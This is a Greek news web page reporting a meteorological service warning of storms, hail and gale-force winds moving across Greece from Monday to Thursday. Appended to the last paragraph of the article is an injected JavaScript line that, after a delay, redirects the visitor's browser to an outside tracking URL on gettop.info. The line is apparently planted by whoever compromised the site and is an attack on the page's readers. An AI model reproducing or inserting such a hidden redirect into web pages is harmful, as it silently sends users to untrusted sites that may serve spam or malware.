Έρχονται καταιγίδες, χαλάζι και θυελλώδεις άνεμοι

 

Αλλάζει το σκηνικό του καιρού καθώς αναμένονται ισχυρές βροχές και καταιγίδες, οι οποίες πιθανώς θα συνοδεύονται τοπικά από χαλαζοπτώσεις, και τους θυελλώδεις ανέμους (6 με 8 και πιθανώς πρόσκαιρα 9 μποφόρ). Τα έκτακτα καιρικάφαινόμενα όπως ενημερώνει η ΕΜΥ θα ξεκινήσουν από σήμερα, Δευτέρα και από τα βορειοδυτικά.

Από τα φαινόμενα θα επηρεαστούν, αύριο, Τρίτη τα νησιά του Ιονίου, η Ήπειρος, η δυτική και η κεντρική Στερεά, η βορειοδυτική Πελοπόννησος και πρόσκαιρα στην αρχή της ημέρας η δυτική και κεντρική Μακεδονία και από το απόγευμα η ανατολική Μακεδονία και Θρακη.

Μεθαύριο, Τετάρτη, τα νησιά του Ιουνίου, η Ήπειρος, η δυτική και η κεντρική Στερεά, η δυτική Πελοπόννησος, η Θεσσαλία, η Μακεδονία, η Θράκη και από το μεσημέρι σταδιακά και η υπόλοιπη χώρα.

Παρά τη βαθμιαία εξασθένηση των φαινομένων από το βράδυ της Τετάρτης και από τα δυτικά, η Θράκη και τα νησιά του ανατολικού Αιγαίου και τα Δωδεκάνησα πιθανώς θα επηρεάζονται μέχρι τις πρώτες πρωινές ώρες της Πέμπτης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

Σχετικά Άρθρα


Αφήστε το σχόλιο σας

*